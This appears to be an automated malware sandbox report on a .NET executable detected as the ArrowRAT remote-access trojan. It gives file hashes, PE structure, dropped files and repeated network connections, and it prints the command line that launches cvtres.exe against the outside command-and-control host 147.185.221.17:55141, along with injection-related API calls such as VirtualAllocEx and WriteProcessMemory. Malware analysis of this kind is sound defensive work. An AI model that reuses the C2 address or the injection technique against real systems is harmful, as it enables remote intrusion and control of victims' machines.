                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64
                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                      Category:dropped
                                      Size (bytes):40960
                                      Entropy (8bit):0.8553638852307782
                                      Encrypted:false
                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:modified
                                      Size (bytes):10
                                      Entropy (8bit):2.2464393446710154
                                      Encrypted:false
                                      SSDEEP:3:tBOR:LOR
                                      MD5:C3A2582C222BAA3AF8351960ED4E6ABC
                                      SHA1:29798F8DD7C232B64B7BEB06C5795D1061E40495
                                      SHA-256:F3595F5E6C2F6781B1FDDCABACCD6B70DD03D119CB1FE4B990E1755FA18F0E95
                                      SHA-512:CB52B976D7BB3F91DCA812C604DDC27D954776BCB6D8046667212C4990C3F27B9E76D68B7D6E97B98D134B338A57CCED5939DBC2636DB45A37253035519DE042
                                      Malicious:false
                                      Reputation:low
                                      Preview:09/24/2024
                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):4.55738394580979
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      File name:IWsK3V2Ul9.exe
                                      File size:162'304 bytes
                                      MD5:d89a424f932b8a69a4657e7ec09944da
                                      SHA1:7e1b1c99d1bc8fdbc8173ca9eda77dd2f4fd287c
                                      SHA256:040cef4a919bf259e750029187dcfeff8b4b8f18e6a65cb401ee941d7999dd51
                                      SHA512:459d3531c2f72637c99cd484f555a558f3aafc8e1d967e2333470863310d34fdfae8f0da3a7f20672e9040aaf2b2be3b3d6195dc6aaf0b9a53d28a40aa4282fe
                                      SSDEEP:3072:qbz+H+0OoCthfbEFtbcfjF45gjryKKqH6JY2doszEmQotEPPcfPoKO8Y:qbz+e0ODhTEPgnjuIJzo+PPcfPo18
                                      TLSH:24F36D243AFA5029F173AF7A5FE47596CA2FB7733B07985D2050038A4B23A81DDD153A
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...UG&..........."...0..b............... ........@.. ....................................`................................
                                      Icon Hash:90cececece8e8eb0
                                      Entrypoint:0x428202
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0xF7264755 [Wed May 25 16:16:21 2101 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x281b80x4a.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2a0000x10c4.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2c0000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000x262080x264007c81d9fdd7282ba962f30abe6cebfde7False0.4924236621732026data4.514946668454454IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc0x2a0000x10c40x120066865dd7ca73ed6bfb0f00d499cbed86False0.369140625data4.916643761159989IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x2c0000xc0x200e0df67a915305135d335430a38de970dFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_VERSION0x2a0a00x2dcdata0.4562841530054645
                                      RT_MANIFEST0x2a37c0xd48XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.38588235294117645
                                      DLLImport
                                      mscoree.dll_CorExeMain
                                      TimestampSource PortDest PortSource IPDest IP
                                      Sep 24, 2024 13:29:30.128213882 CEST4970255141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:29:30.133305073 CEST5514149702147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:29:30.133388042 CEST4970255141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:29:30.142462969 CEST4970255141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:29:30.147521019 CEST5514149702147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:29:30.147741079 CEST4970255141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:29:30.154010057 CEST5514149702147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:29:51.497970104 CEST5514149702147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:29:51.498109102 CEST4970255141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:29:51.505687952 CEST4970255141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:29:51.511357069 CEST5514149702147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:29:52.516964912 CEST4970755141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:29:52.521918058 CEST5514149707147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:29:52.522057056 CEST4970755141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:29:52.522795916 CEST4970755141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:29:52.527676105 CEST5514149707147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:29:52.527756929 CEST4970755141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:29:52.532620907 CEST5514149707147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:30:13.874135017 CEST5514149707147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:30:13.874275923 CEST4970755141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:30:13.875339985 CEST4970755141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:30:13.880155087 CEST5514149707147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:30:14.905772924 CEST4970855141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:30:14.928627968 CEST5514149708147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:30:14.928793907 CEST4970855141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:30:14.943097115 CEST4970855141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:30:15.124325037 CEST5514149708147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:30:15.124430895 CEST4970855141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:30:15.129271030 CEST5514149708147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:30:36.483082056 CEST5514149708147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:30:36.483421087 CEST4970855141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:30:36.484632015 CEST4970855141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:30:36.489397049 CEST5514149708147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:30:37.485795975 CEST4971055141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:30:37.491429090 CEST5514149710147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:30:37.491606951 CEST4971055141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:30:37.492485046 CEST4971055141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:30:37.498498917 CEST5514149710147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:30:37.498610973 CEST4971055141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:30:37.503943920 CEST5514149710147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:30:58.858619928 CEST5514149710147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:30:58.859549999 CEST4971055141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:30:58.880492926 CEST4971055141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:30:58.887442112 CEST5514149710147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:30:59.892107010 CEST4971155141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:30:59.896934032 CEST5514149711147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:30:59.897012949 CEST4971155141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:30:59.898041964 CEST4971155141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:30:59.902839899 CEST5514149711147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:30:59.902916908 CEST4971155141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:30:59.907711983 CEST5514149711147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:31:21.271055937 CEST5514149711147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:31:21.271189928 CEST4971155141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:31:21.272816896 CEST4971155141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:31:21.277615070 CEST5514149711147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:31:22.282857895 CEST4971255141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:31:22.287862062 CEST5514149712147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:31:22.287942886 CEST4971255141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:31:22.288494110 CEST4971255141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:31:22.293260098 CEST5514149712147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:31:22.293303967 CEST4971255141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:31:22.298305035 CEST5514149712147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:31:43.688402891 CEST5514149712147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:31:43.688514948 CEST4971255141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:31:43.689800024 CEST4971255141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:31:43.696482897 CEST5514149712147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:31:44.704941034 CEST4971355141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:31:44.709954023 CEST5514149713147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:31:44.713093042 CEST4971355141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:31:44.716912985 CEST4971355141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:31:44.721693993 CEST5514149713147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:31:44.725049973 CEST4971355141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:31:44.730509996 CEST5514149713147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:32:06.096158981 CEST5514149713147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:32:06.096378088 CEST4971355141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:32:06.104988098 CEST4971355141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:32:06.110006094 CEST5514149713147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:32:07.110982895 CEST4971455141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:32:07.115907907 CEST5514149714147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:32:07.115988016 CEST4971455141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:32:07.122385979 CEST4971455141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:32:07.127335072 CEST5514149714147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:32:07.127417088 CEST4971455141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:32:07.132253885 CEST5514149714147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:32:28.471304893 CEST5514149714147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:32:28.471415043 CEST4971455141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:32:28.472709894 CEST4971455141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:32:28.477547884 CEST5514149714147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:32:29.485934973 CEST4971555141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:32:29.490871906 CEST5514149715147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:32:29.490952969 CEST4971555141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:32:29.491729975 CEST4971555141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:32:29.496551037 CEST5514149715147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:32:29.496598005 CEST4971555141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:32:29.501460075 CEST5514149715147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:32:50.849921942 CEST5514149715147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:32:50.850027084 CEST4971555141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:32:50.850828886 CEST4971555141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:32:50.856865883 CEST5514149715147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:32:51.860833883 CEST4971655141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:32:51.865861893 CEST5514149716147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:32:51.865964890 CEST4971655141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:32:51.866782904 CEST4971655141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:32:51.871624947 CEST5514149716147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:32:51.871715069 CEST4971655141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:32:51.876502991 CEST5514149716147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:33:13.240570068 CEST5514149716147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:33:13.240628958 CEST4971655141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:33:13.241703987 CEST4971655141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:33:13.246921062 CEST5514149716147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:33:14.253143072 CEST4971755141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:33:14.258277893 CEST5514149717147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:33:14.258459091 CEST4971755141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:33:14.259196997 CEST4971755141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:33:14.264158010 CEST5514149717147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:33:14.264669895 CEST4971755141192.168.2.11147.185.221.17
                                      Sep 24, 2024 13:33:14.269675970 CEST5514149717147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:33:35.613765955 CEST5514149717147.185.221.17192.168.2.11
                                      Sep 24, 2024 13:33:35.613852978 CEST4971755141192.168.2.11147.185.221.17

                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:07:29:26
                                      Start date:24/09/2024
                                      Path:C:\Users\user\Desktop\IWsK3V2Ul9.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\Desktop\IWsK3V2Ul9.exe"
                                      Imagebase:0x20efc780000
                                      File size:162'304 bytes
                                      MD5 hash:D89A424F932B8A69A4657E7EC09944DA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_ArrowRAT, Description: Yara detected ArrowRAT, Source: 00000000.00000002.1422800381.0000020E80001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:07:29:27
                                      Start date:24/09/2024
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\explorer.exe"
                                      Imagebase:0x7ff611de0000
                                      File size:5'141'208 bytes
                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:07:29:27
                                      Start date:24/09/2024
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\explorer.exe /NoUACCheck
                                      Imagebase:0x7ff611de0000
                                      File size:5'141'208 bytes
                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:4
                                      Start time:07:29:27
                                      Start date:24/09/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 147.185.221.17 55141 YnZwwlrYv
                                      Imagebase:0xff0000
                                      File size:46'832 bytes
                                      MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_ArrowRAT, Description: Yara detected ArrowRAT, Source: 00000004.00000002.3874161154.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:moderate
                                      Has exited:false

                                      Target ID:5
                                      Start time:07:29:27
                                      Start date:24/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff68cce0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:27.5%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:13.9%
                                        Total number of Nodes:36
                                        Total number of Limit Nodes:1

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 87 7ffe7e1b2e69-7ffe7e1b2e70 88 7ffe7e1b2ecc-7ffe7e1b2ed2 87->88 89 7ffe7e1b2e72-7ffe7e1b2e81 87->89 90 7ffe7e1b2f2b 88->90 91 7ffe7e1b2ed4-7ffe7e1b2ed7 88->91 98 7ffe7e1b2ef2-7ffe7e1b2ef3 89->98 99 7ffe7e1b2e83-7ffe7e1b2e85 89->99 93 7ffe7e1b2f2c-7ffe7e1b2f30 90->93 94 7ffe7e1b2f58 91->94 95 7ffe7e1b2ed9-7ffe7e1b2edb 91->95 113 7ffe7e1b2f32-7ffe7e1b2f55 93->113 96 7ffe7e1b2fb9-7ffe7e1b302f 94->96 97 7ffe7e1b2f5a-7ffe7e1b2f5c 94->97 100 7ffe7e1b2f57 95->100 101 7ffe7e1b2edd 95->101 127 7ffe7e1b3039-7ffe7e1b30a9 CreateDesktopW 96->127 128 7ffe7e1b3031-7ffe7e1b3036 96->128 102 7ffe7e1b2f5d-7ffe7e1b2f61 97->102 103 7ffe7e1b2f01-7ffe7e1b2f1e 98->103 99->103 104 7ffe7e1b2e87 99->104 100->94 107 7ffe7e1b2f20-7ffe7e1b2f24 101->107 108 7ffe7e1b2edf-7ffe7e1b2ee1 101->108 109 7ffe7e1b2f63-7ffe7e1b2f65 102->109 103->107 110 7ffe7e1b2e89 104->110 111 7ffe7e1b2e0e-7ffe7e1b2e1c 104->111 112 7ffe7e1b2f26-7ffe7e1b2f2a 107->112 108->102 114 7ffe7e1b2ee3 108->114 117 7ffe7e1b2f69-7ffe7e1b2fa3 109->117 110->88 115 7ffe7e1b2e66 111->115 116 7ffe7e1b2e1e-7ffe7e1b2e41 111->116 112->90 113->100 114->112 120 7ffe7e1b2ee5-7ffe7e1b2ee7 114->120 115->87 116->115 120->109 122 7ffe7e1b2ee9 120->122 122->93 123 7ffe7e1b2eeb-7ffe7e1b2eed 122->123 123->117 126 7ffe7e1b2eef 123->126 126->113 131 7ffe7e1b2ef1 126->131 129 7ffe7e1b30ab 127->129 130 7ffe7e1b30b1-7ffe7e1b30de 127->130 128->127 129->130 131->98
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1424911377.00007FFE7E1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E1B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe7e1b0000_IWsK3V2Ul9.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 71a27ac53c51f205cbd9469ba6afb61f909a2070747941223f1d6ee01ae8152e
                                        • Instruction ID: ec2739ac41bfe53391180f9f33cd426483f41b377554481c644be45a26e7595d
                                        • Opcode Fuzzy Hash: 71a27ac53c51f205cbd9469ba6afb61f909a2070747941223f1d6ee01ae8152e
                                        • Instruction Fuzzy Hash: FF911A3291CB8C4FD754DB6884466FA7BE0EF5A311F0406BFE09DD36A2DA38A849C741

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 76 7ffe7e1b213a-7ffe7e1b2459 78 7ffe7e1b245b 76->78 78->78 79 7ffe7e1b245d-7ffe7e1b2511 VirtualAllocEx 78->79 84 7ffe7e1b2519-7ffe7e1b253f 79->84 85 7ffe7e1b2513 79->85 85->84
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1424911377.00007FFE7E1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E1B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe7e1b0000_IWsK3V2Ul9.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 93b941218de3b9e78fa8201736eeaac0e58f13a6ca76902074a740418d8e3e40
                                        • Instruction ID: ce14c13fe86d7d22036093ab343bc6ff0e72057918e4fa83d7f506c26e20b70d
                                        • Opcode Fuzzy Hash: 93b941218de3b9e78fa8201736eeaac0e58f13a6ca76902074a740418d8e3e40
                                        • Instruction Fuzzy Hash: 3E31F83191CB8C4FDB19AB6898566FD7BF0EF56310F0402AFD089C3652DA646816C782

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 133 7ffe7e1b2544-7ffe7e1b254b 134 7ffe7e1b2556-7ffe7e1b2569 133->134 135 7ffe7e1b254d-7ffe7e1b2555 133->135 136 7ffe7e1b256b 134->136 135->134 136->136 137 7ffe7e1b256d-7ffe7e1b25e5 136->137 141 7ffe7e1b25e7-7ffe7e1b25ec 137->141 142 7ffe7e1b25ef-7ffe7e1b2644 WriteProcessMemory 137->142 141->142 144 7ffe7e1b2646 142->144 145 7ffe7e1b264c-7ffe7e1b267d 142->145 144->145
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1424911377.00007FFE7E1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E1B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe7e1b0000_IWsK3V2Ul9.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
